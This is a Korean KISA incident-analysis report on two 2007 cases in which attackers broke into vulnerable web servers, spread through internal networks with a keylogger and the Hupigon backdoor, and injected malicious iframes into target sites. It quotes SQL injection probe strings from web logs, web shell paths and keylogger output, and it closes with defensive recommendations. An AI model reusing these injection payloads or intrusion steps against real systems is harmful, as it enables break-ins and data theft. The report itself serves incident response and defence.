untitled

Size: px
Start display at page:

Download "untitled"

Transcription

1 취약한웹서버공격을통한 내부망해킹및악성코드삽입사례 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여 주시기바랍니다

2 1. 개요 최근대부분의웹서버침해사고에서는눈에띄지않도록악성코드를숨겨두어방문자의컴퓨터에악성프로그램을설치하고구동시키는양상으로발전하고있다 [1]. 이러한악성코드의전파를통해, 웹변조침해사고의범위를일반사용자들의 PC까지확대시킨대표적인이유는, PC 사용자의계정정보또는개인정보를탈취하거나수집하여악용함으로써, 금전적인이익을얻기위함이다. 그러므로원하는정보의수집을극대화하기위해서악성코드들의수명을연장시키고, 많은수의 PC에침투해야하기때문에더욱더정교한방법으로이루어지고있다. 공격자들은더많은악성코드를유포시키기위해사용자접속빈도가높은사이트들을대상으로공격을시도하고있다. 하지만이미보안조치가이루어진사이트들이많아지자공격자들은악성코드삽입대상웹서버를직접공격하지않고상대적으로취약한방화벽내부네트워크를경유하여대상웹서버에접근한다. 서버관리자나네트워크담당자들은서버보안을위해방화벽을두어트래픽을제어하거나 NAT 환경으로구축하여외부아이피와구분하는방법을주로사용한다. 하지만몇몇관리자들은방화벽내부에존재하는서버들에대해보안설정이나외부의위협에대해서는크게신경을쓰지않는다. 공격자는이러한내부망에침입하기위해악성코드를삽입하려는대상서버웹페이지에모든링크들을따라가취약한웹서버를찾고그중서브네트워크대역이같은서버를공격하여내부망에침입하게된다. 본고에서는단일서버웹페이지에악성코드를삽입한경우가아닌취약한웹서버를경유해내 부망에침입하여대상웹사이트에악성코드를삽입하는사례를소개하고자한다. 이과정을간 략히요약한내용은아래와같다. o 공격자는대상웹서버페이지들에서관련링크들을모두조사하여대상웹서버와같은서브네트워크의취약한웹서버를찾음 o 취약한웹서버침입후키로거설치및내부망취약점스캔 o 대상웹서버에 FTP 접속및관리자공유로접속하여악성코드삽입 - 2 -

3 2. 사례 1 첫번째사례의공격대상웹서버는상당히많은사용자들이접속하는사이트였으며웹방화벽 이적용되어취약점찾기가쉽지않았다. 하지만공격자는대상사이트들에링크걸려있는모든 사이트들을확인하고취약한윈도우웹서버를찾아공격하여내부망침입에성공하게된다. 가. OO 업체네트워크운영현황 o 서울모통신社 IDC에서서버호스팅 o 웹, DB 서버등총 20여대서버가동일한공인 IP대역사용 o 네트워크방화벽을운영하여 TCP 80 port만허용 - 원격의관리자 PC는모든서버, 포트접속가능 o 웹방화벽적용서버 - 공격대상리눅스웹서버 3대 - 윈도우즈 2003 서버 2대 o 각 OS별동일 ID/PW 사용 - 윈도우즈서버군과리눅스서버군은패스워드가틀림 o 관리자는 IDC에자주방문하여특정서버에서다른서버들에원격접속을함 o ( 그림 1) 취약한웹서버 ( 윈도우즈 2003) 최초해킹당함 - 방화벽미적용윈도우서버임 (IIS + MSSQL) - 최초 O월 1일 22시경파일업로드공격 나. 분석내용 피해를입은업체의전체네트워크구조와공격개요는 ( 그림 1) 과같으며공격자의공격내용 을아래와같이요약할수있다. ➀ 1일 22시경중국발아이피에서취약한윈도우즈서버를대상으로 asp 파일업로드공격성공 ( 웹쉘 help.asp 업로드 ) ➁ 1일 22시경피해시스템에 smxx.exe 키로거설치 (Message Hook 이용한키로거 ) - c:\windows\system32\drivers\tcpipd.sys 파일에키로깅 ➂ 관리자는취약한서버에서다른윈도우즈서버터미널접속하여키로거파일에다른윈도우서버의아이디 / 패스워드노출 - 3 -

4 ➃ 2일 8시 ~ 8일 9시까지키로거파일모니터링하여다른윈도우서버들터미널접속후악성코드설치 ➄ 관리자는직접 IDC 방문, 취약한서버에서관리자 PC에원격접속함으로써키로거파일에관리자 PC 아이디 / 패스워드기록됨 ➅ 9일새벽 1시경공격자는관리자 PC 원격접속함 ➆ 10일새벽 0시경공격자는관리자 PC에서공격대상웹서버 FTP에접속하여 OOOO.js 파일에악성코드삽입 ➇ 2개월후 1, 3일공격자는관리자 PC에서새벽 3~4시경공격대상웹서버 FTP에재접속하여 OO.js 파일에악성코드삽입 ( 그림 1) OO 업체네트워크구조및공격개요 - 4 -

5 피해시스템분석 ( 그림 1. 취약한서버 ) 같다. 최초공격자에게피해를입고내부망해킹에원인을제공한윈도우즈웹서버정보는다음과 도메인 : OOOO.XXXX.co.kr등 OS : Windows 2003, IIS 공격 : 파일업로드공격 공격 IP : 22X.21X.XX.17X ( 중국발 ) 공격시간 : 2007.O.1 22:29 최초공격성공 o 공격자는공격대상웹서버페이지의링크들을따라가다위웹서버의페이지를발견하고 SQL Injection 공격을시도한다. 하지만 SQL Injection 공격에실패하고회원가입하여다 른취약점을찾는다 O-01 22:04:59 W3SVC1 OO.OO.OO.OO GET /OOWeb/xxxxx.aspx ArticleCode=4'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''=' 80-22X.21X.XX.17X O-01 22:05:57 W3SVC1 OO.OO.OO.OO GET /OOWeb/login.aspx ReturnUrl=%2fOOOWeb%2fMyPage.aspx'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''=' O-01 22:06:04 W3SVC1 OO.OO.OO.OO GET /OOWeb/login.aspx ReturnUrl=%2fOOOWeb%2fMyPage.aspx'%20and%201=1%20and%20''=' O-01 22:06:16 W3SVC1 OO.OO.OO.OO GET /OOWeb/JoinAgree.aspx O-01 22:06:18 W3SVC1 OO.OO.OO.OO GET /OOWeb/Agreement.htm O-01 22:07:57 W3SVC1 OO.OO.OO.OO POST /OOWeb/JoinInfo.aspx o 게시판에서파일업로드공격을시도하지만실패한다 O-01 22:10:22 W3SVC1 OO.OO.OO.OO GET /OOWeb/Board_write.aspx X.21X.XX.17X O-01 22:12:11 W3SVC1 OO.OO.OO.OO GET /OOBoard/20070O/002/1054/Eup.asa X.21X.XX.17X ( 에러발생 ) o 파일이업로드되는디렉터리생성규칙을파악하여파일의절대경로를요청하여 Help.aspx 웹쉘을실행한다

6 2007-0O-01 22:23:23 W3SVC1 OO.OO.OO.OO POST /OOWeb/OO_write.aspx typecode=&category= 80-22X.21X.XX.17X O-01 22:23:44 W3SVC1 OO.OO.OO.OO POST /OOBoard/20070x/001/1056/Help.aspx X.21X.XX.17X o 공격자는새로운웹쉘을통해악성코드업로드및실행 O-01 22:29:34 W3SVC1 OO.OO.OO.OO POST /OOBoard/200410/001/112/help.aspx action=upfile&src=c%3a%5cwindows%5csystem32%5cspool%5c - 신규웹쉘업로드 (2일오전 7시 ) c:\windows\system32\com\lib.aspx c:\windows\system32\mui\job.asp - 악성코드업로드 c:\windows\system32\smxx.exe ( 키로거 ) c:\windows\system\system.com ( 리버스백도어 ) c:\windows\system32\spool\help.com.txt.exe ( 리버스백도어 ) - 6 -

7 o 키로거 smxx.exe 는 netcfg.dll 과연동되며아래와같은파일의아이디 / 패스워드로그를남긴 다. c:\windows\system32\drivers\tcpipd.sys ----OO.OO.OO.OO - 원격데스크톱---- administrator\ xxxxxx [Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab]ꠒz[<=]/z.exe ----실행---- c[<=]mstsc console[ ][ ][ ][ ][ ][ ][ ] x.xx7.xx.4x - 원격데스크톱---- [<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=][<=]frxxxx [ ][ ][ ][ ][ ][Del] < 중략 >... [Tab]78xxxx 위로그의첫번째원격데스크톱연결은관리자가피해시스템에서내부윈도우즈서버에 원격접속한로그가기록된것이다. 그리고두번째원격데스크톱연결은관리자가피해시 스템에서외부에있는관리자 PC 에원격접속한로그가기록된것이다. 위키로거로인해공격자는내부윈도우즈서버와관리자 PC 아이디 / 패스워드를가로채어 이후에계속피해를입게된다. o system.com, help.com.txt.exe 악성코드는 Reverse 백도어 Hupigon으로공격자가피해시스템으로접속해오는게아니라피해시스템에서공격자서버로접속하는방식의원격제어악성코드이다. 이악성코드의특징은아래와같다. - 정상적인 IEXPLORE.exe 를실행한후 system.com 코드를메모리상에복사하여실행시킨다. 정상적인 IEXPLORE.exe 처럼보이지만내부실행코드는실제 system.com의코드가실행된다. - 원격제어공격자서버로바로접속하는게아니라실제공격자서버의정보를알려주는서버를경유하게된다. 요청하여아래의정보를받는다

8 접속시도 기타윈도우즈서버분석 취약한윈도우즈서버에설치된키로거를통해내부네트워크의모든윈도우즈서버가해킹을당하게된다. 공격자는관리자가취약한서버원격데스크톱연결에서입력한아이디 / 패스워드를가로채어기타윈도우서버에터미널접속을성공하게된다. 아래 ( 그림 2) 는공격자가취약한서버에서기타윈도우서버에터미널로로그인한이벤트로그이고이후 smxx.exe를설치및실행한것을확인할수있다. 모든윈도우즈서버는같은아이디 / 패스워드를사용 ( 그림 2) 원격접속이벤트로그 - 8 -

9 o 기타윈도우서버 2 : - 8일 09:16 취약한서버에서터미널접속 - O.08 09:17 Help.Com.Txt.exe 설치 o 기타윈도우서버 3 : - 8일 08:58 기타윈도우서버1에서터미널접속 - 8일 08:58 Help.Com.Txt.exe 설치 o 기타윈도우서버 4 (DB 서버 ) : - 8일 09:22 기타윈도우서버1에서터미널접속 - 8일 09:23 smxx.exe 설치 o 다른기타윈도우서버들에서도각각취약한서버에서발견된웹쉘, sytem.com, Help.Com.Txt.exe 파일들이대동소이하게생성되어있었음 관리자 PC 분석 관리자는 IDC에방문하여취약한서버에로그인하고사무실에있는본인의 PC에원격접속한다. 하지만공격자가미리설치해둔키로거로인해관리자 PC의아이디 / 패스워드는노출되고공격자가공격대상웹서버에악성코드를삽입하기위해관리자 PC에까지침입하게된다. 관리자 PC의정보는아래와같다. 관리자 PC IP : 21x.xx7.xx.4x OS : Windows XP Professional 공격 : 아이디 / 패스워드노출로인한원격접속 공격 IP :? ( 확인할수없었음 ) 공격시간 : 2007.O.9 o 관리자 PC에는윈도우즈서버들에설치되었던악성코드들과같은코드들이설치되어있었다. 이악성프로그램들은 IEXPLORE.exe로실행되고작업관리자에서는프로세스가보이지않았다. - help.com.txt.exe, system.com ( 파일생성시간은 9일오전 01:00 시경임 ) - 9 -

10 o 관리자 PC에는공격대상서버에원격으로접속할수있는자동로그인 ssh 설정과 ftp 설정이있어공격자는쉽게대상서버에침입할수가있었다. 공격대상웹서버분석 공격자는공격대상서버에침입하기위해관리자 PC 까지침입하게되고 PC 에저장되어있던 ftp 자동설정으로공격자는쉽게대상웹서버에접근하여원하는페이지를수정하게된다. 대상 서버에대한정보는아래와같다. 도메인 : OS : Linux 공격 : 관리자 PC 경유한 FTP 접속 공격IP : 2xx.xx7.xx.4x ( 관리자PC)

11 공격날짜 : O월 10일, 2개월후 2-3일 o 공격대상웹서버 ftp xferlog를분석한결과아래와같이관리자 PC를경유해페이지를변조한로그를확인할수있었다. ( 관리자 PC IP는 2xx.xx7.xx.4x임 ) - OOOO.js 변조 (10 일 ) Tue OO 10 00:48: xx.xx7.xx.4x /home/httpd/mshtml/oooo.js b _ i r ftp 0 * c Tue OO 10 00:49: xx.xx7.xx.4x /home/httpd/mshtml/oooo.js b _ o r ftp 0 * c - OO.js 변조 (2개월후 1-3일 ) OO 1 03:09: xx.xx7.xx.4x /home/httpd/mshtml/oo/oo.js b _ o r ftp 0 * c OO 1 03:09: xx.xx7.xx.4x /home/httpd/mshtml/oo/oo.js b _ i r ftp 0 * c OO 1 03:10: xx.xx7.xx.4x /home/httpd/mshtml/oo/oo.js b _ o r ftp 0 * c OO 1 03:11: xx.xx7.xx.4x /home/httpd/mshtml/oo/oo.js b _ i r ftp 0 * c OO 3 04:07: xx.xx7.xx.4x /home/httpd/mshtml/oo/oo.js b _ o r ftp 0 * c OO 3 04:07: xx.xx7.xx.4x /home/httpd/mshtml/oo/oo.js b _ i r ftp 0 * c o 공격자는웹페이지들을변경하여보안패치를하지않은사용자들을공격하는악성스크립트를삽입하게된다. 아래는변조된파일시간및삽입된내용이다. [root@ooo log]# ls -al /home/httpd/newhtml/oo/oo.js -rw-r--r-- 1 xxxx nobody O월 3 04:07 /home/httpd/newhtml/oo/oo.js <iframe height=0 width=0 src=" 코드삽입

12 3. 사례 2 본장에서설명할사례는앞서설명한건과거의유사한방식이며같은키로거, 백도어악성코드가사용되어같은해킹그룹소속이거나공격자로의심되는사고이다. 공격자는악성코드경유지대상인웹사이트에부가서비스를제공하던협력업체웹서버를공격하여내부망에접근한다. 협력업체웹서버는계약이끝나관리가안된상태로방치되고있었으며공격자는그웹서버의홈페이지취약점을공격하여시스템에침입한다. 공격자는앞의사례처럼키로거를이용하는것뿐만아니라사용자로그인아이디 / 패스워드를가로채는악성코드설치, 패스워드크랙, 관리공유폴더취약점공격등을시도하여다른서버들을침입한다. 가. OO 업체네트워크운영현황 o OO업체 IDC에총 200여대의서버존재 - 대부분의협력업체서버들은별도의네트워크에서운영 o 네트워크구성 - Frontend와 Backend로나눠서네트워크를운영 - 각서버들은네트워크카드 2개를통해 Frontend( 공인IP), Backend ( 사설 IP) 연결 - Frontend는외부와연결되며방화벽을통해접근제어되고각서버군별로네트워크구분함 - Backend는내부망만통신되고내부네트워크모두접근가능함, 모든서버들에접근가능함 o 주로 Windows 2003 서버들이공격당함 o 내부시스템들모두아이디 / 패스워드동일 o 대부분의윈도우즈서버에관리자공유가열려있었음 (C$, D$) 나. 분석내용 피해를입은업체의전체네트워크구조와공격개요는 ( 그림 3) 과같으며공격자의공격내용 을아래와같이요약할수있다. ➀ 최초 07.O.8 3:32 취약한서버에 SQL injection 공격으로시스템권한획득 - 웹쉘 help.asp 를생성및 system.com 이라는 Hupigon 원격제어프로그램을실행한후리

13 버스로연결하여공격자에게접속하게함 ➁ 8일 04:30 Win1 서버침입후 ntscan.exe 실행하여내부네트워크관리자공유스캔 ➃ 19일취약한서버에서 Target1 서버에관리자공유 file://target1/ooo/story/js/flash_object.js 로접속해악성코드삽입 ➄ 21일 Win3 서버에서 Target4 서버에접속해 file://target4/ooo/news/js/common.js에 iframe 삽입 ➅ 23~24일에도지속적으로공격자가몇몇서버에터미널접속을함 ( 그림 3) OO 업체공격개요도 취약한서버분석 이취약한서버는공격대상서버에서링크가걸려운영중이던협력업체웹서버였으며 SQL

14 Injection 취약점이존재하여공격자에게내부망에침입할수있는빌미를제공하게된다. IP, 도메인 : 사설아이피, xxxx.xxxxxx.com OS : Windows 2003, IIS 공격 : SQL Injection 공격 IP : 확인할수없음 ( 웹로그를 3일만남김 ) 공격시간 : 2007.O.08 03:45 최초공격성공 o 8일 3:35경에최초 SQL Injection으로취약한서버의 DB 서버에아래와같이공격자가생성한테이블을확인할수있었다. o 공격자는시스템침입에성공한후아래와같은웹쉘들을생성하였다. 최근에는가상디렉터리를 c:\windows\system32\mui 와같은윈도우시스템폴더에링크를시켜웹쉘을생성하곤한다. ( 관리자의탐지를피하기위해 ) - 8일 3:42분 help.asp 생성 - 8일 4:02분 job.cer 생성 (C:\windows\system32\mui) - 8일 4:14분 mssql.asp 생성 o 이후공격자는 admin 이라는계정을생성하고 Hupigon (system.com) 리버스백도어를실행한다. 아래는 system.com을실행하는 Windows.system 이라는서비스가 3:56분에실행된것을시스템이벤트로그에서확인할수있었다. O/8/2007 오전 3:56: Service Control Manager N/A OOO Windows.system 실행 o 19일 Target1 서버에관리자공유로접속하여악성코드를삽입한다. 사용자인터넷히스토리를분석한결과아래와같이대상서버의특정페이지를수정하였다

15 URL : file://target1/ooo/story/js/flash_object.js Modified Date : 2007-O-19 오후 5:25:26 User Name : user1 Win1 서버분석 Win1 서버는 8 일 4 시경에최초악성코드가설치되었고리버스백도어 (Hupigon) 로인해공격 자에게원격제어를받게되었다. 이후내부망전체를대상으로관리자공유취약점스캔을수행한 다. IP : 사설아이피 OS : Windows 2003, Exchange 공격 : ID, Password 노출로인한원격접속 공격 IP : 취약한서버 공격시간 : 2007.O.08 04:27 최초공격성공 Win1 사용자패스워드를어떻게알게되었는지확인할수없었다. 하지만많은서버들에서발견된사용자로그인계정스틸러 (Gina.exe), 키로거 (smxx.exe), 패스워드크랙툴 (sam.exe), 관리자공유취약점스캔툴 (ntscan.exe) 이발견되었기때문에그러한툴들을이용해패스워드를알아냈을것이다. o 8일 4:27 분경취약한서버로부터원격접속을통해악성코드를설치하게된다. 아래로그는리버스백도어가서비스로실행된이벤트로그이다. 10/8/2007 오전 4:49: Service Control Manager OOO01\oooo OOO01 Windows.system 시작 o 8일 4:36 분에내부네트워크를대상으로관리공유폴더취약점을스캔한다. 내부네트워크모든시스템에아래와같은 Null Session 연결을시도하는이벤트로그가기록되었다. OO/8/2007 오전 4:36: LsaSrv N/A OOO01 xx.xx.xx.xx ( 사설아이피 ) 에서연결된익명세션이이컴퓨터의 LSA 정책핸들을열려고시도했습니다. 해당시도는보안에문제가될수있는정보가익명호출자에게노출되지않도록 STATUS_ACCESS_DENIED로거부되었습니다. 기타서버분석

16 o 8일 05:07 취약한서버로부터아이디 / 패스워드를확인한공격자는 Win1서버에로그인한후다른서버들도아이디패스워드를같이사용한다는사실을인지하고계속해서침입해간다. 아래는취약한서버에서 Win2 서버에원격접속한보안이벤트로그이다. OO/8/2007 오전 5:07: Security OOOWEB01\user1 OOOWEB01 user1 OOOWEB01 (0x0,0x844A2C83) 10 User32 NegotiateOOOWEB01 - OOOWEB01$ XXXXXX (0x0,0x3E7) Win1사설아이피 2755 o 20일공격자는 Win3에원격접속하여 Target4 서버에관리자공유로접속하여악성코드를삽입한다. Win3의사용자인터넷히스토리를분석한결과아래와같은접속결과를확인하였다. URL : file://target4/ooo/news/js/common.js Modified Date : 2007-OO-21 오전 12:37:41 User Name : user1 o 22일각서버들에서 smxx.exe 생성및실행, 공격자는계속해서관리자들이패스워드를변경하는것을알고키로거프로그램을설치하여변경된패스워드를기록하려고한다

17 5. 결론및대책 본사고의분석결과가장큰특징은내부망에서관리자들이쉽게간과하는보안관리의취 약점들을공격자가이용했다는점이다. 앞서설명한두사례에서발생했던내부망보안취약점들 을요약하면아래와같다. o 동일네트워크에취약한웹서버존재 o 중요한주요웹서버군과부수적으로운영되는웹서버군의네트워크분리가안됨 o 내부서버들의아이디 / 패스워드를관리편의상동일하게사용 o 내부망서버에로그인하여또다른서버및관리자 PC에터미널접속을하는습관 o 내부망서버들의관리편의상사용한 Windows 2003 서버들의관리공유폴더취약점 위내부망보안을강화할수있는방법으로는서버들의분리정책을강화해야한다. 첫번째의사례같은경우중요웹서버와그에관련된서버들을한네트워크로연결하고나머지부가서비스를하는서버들을다른네트워크로분리해야한다. 각각서버군을별도로만들고서버군의중요도에따라각각다른정책을적용해만약에발생할수있는사고에대비하는것이좋다. 그리고각서버별다른아이디 / 패스워드를사용하고각종어플리케이션아이디 / 패스워드들 (DB, FTP) 과도다르게적용, 주기적으로패스워드를변경하는강력한패스워드보안정책을적용해야할것이다. 내부망에서관리공유폴더를열어두고각서버별파일관리를하는것은, 이번사례처럼일부가외부로부터침입을당하면쉽게다른서버들의파일들을변경할수있으므로반드시주의해야될사항이다. 하지만결국취약한웹서버에의해내부망전체가피해를입게되었다. 새로운웹사이트를개발해서비스할경우개발단계에서부터문제가없었는지, 홈페이지개발보안가이드 [2] 같은문서를참조하여취약성검사를철저히해야한다. 또한웹변조침해사고가재발되는대부분의경우는악성코드만을삭제하는것으로조치를끝내는경우가많기때문인데, 원인분석을통해침해사고의경로를파악하고취약점을보완하지않으면계속해서재발되는사고를막기는사실상불가능하다. 그러므로침해사고가발생하면분석절차가이드 [3] 등과같은문서를참조하여, 철저한원인분석과보완작업등의사후조치가반드시필요하다. [1] KrCERT 인터넷침해사고동향및분석월보, 악성코드삽입유형분석, , [2] KrCERT 홈페이지개발보안가이드, [3] KrCERT 침해사고분석절차가이드,

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

untitled

untitled 웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는

More information

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770> 네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고

More information

untitled

untitled 디렉토리리스팅취약점을이용한게임 DB 서버해킹사고 2006. 8. 3 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요중국발해킹의표적이온라인게임서버에까지이어지고있다. 특히중국에는현재수많은게임작업장이있으며, 이곳에서는많은중국인들이단순히게임을즐기는것이아니라아이템매매로인한금전적인이득을목적으로한범죄행위를하고있다.

More information

Cloud Friendly System Architecture

Cloud Friendly System Architecture -Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

목차 백업 계정 서비스 이용 안내...3 * 권장 백업 정책...3 * 넷하드(100G 백업) 계정 서버로 백업하는 2가지 방법...3 * 백업서버 이용시 주의사항...3 WINDOWS 서버 사용자를 위한 백업서비스 이용 방법 네트워크 드라이브에 접속하여

목차 백업 계정 서비스 이용 안내...3 * 권장 백업 정책...3 * 넷하드(100G 백업) 계정 서버로 백업하는 2가지 방법...3 * 백업서버 이용시 주의사항...3 WINDOWS 서버 사용자를 위한 백업서비스 이용 방법 네트워크 드라이브에 접속하여 100G 백업계정 서비스 이용안내 (주)스마일서브 가상화사업본부 클라우드 서비스팀 UPDATE 2011. 10. 20. 목차 백업 계정 서비스 이용 안내...3 * 권장 백업 정책...3 * 넷하드(100G 백업) 계정 서버로 백업하는 2가지 방법...3 * 백업서버 이용시 주의사항...3 WINDOWS 서버 사용자를 위한 백업서비스 이용 방법...4 1.

More information

#WI DNS DDoS 공격악성코드분석

#WI DNS DDoS 공격악성코드분석 #WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음

More information

I. 서론 FOCUS 한국인터넷진흥원(KISA) 인터넷침해대응센터(KrCERT)는 다양한 방법으로 해킹사고를 탐지하고 있다. 인터넷침해대응센터 자체적으로 보유하고 있는 탐지체계 뿐만 아니라 시스템 담당자들이 직접 신고하는 신고체계 또한 해킹사고 탐지에 있어 중요한 역할

I. 서론 FOCUS 한국인터넷진흥원(KISA) 인터넷침해대응센터(KrCERT)는 다양한 방법으로 해킹사고를 탐지하고 있다. 인터넷침해대응센터 자체적으로 보유하고 있는 탐지체계 뿐만 아니라 시스템 담당자들이 직접 신고하는 신고체계 또한 해킹사고 탐지에 있어 중요한 역할 FOCUS 1 주요 해킹기법과 대응 전략 이재광 인터넷을 통한 침해사고는 꾸준히 증가하고 있다. 해킹된 시스템은 악성코드를 유포하는 경유지로 악용되거나 또 다른 시스템을 공격하는 공격 도구로 악용되기도 한다. 또한, 시스템을 해킹한 공격자는 시스템을 파괴하거나 시스템이 보유하고 있는 중요 자산을 탈취하여 피해 대상에게 막대한 손실을 입히기도 한다. 한국인터넷진흥원(KISA)

More information

354-437-4..

354-437-4.. 357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%

More information

AhnLab_template

AhnLab_template 해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web

More information

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770> 악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

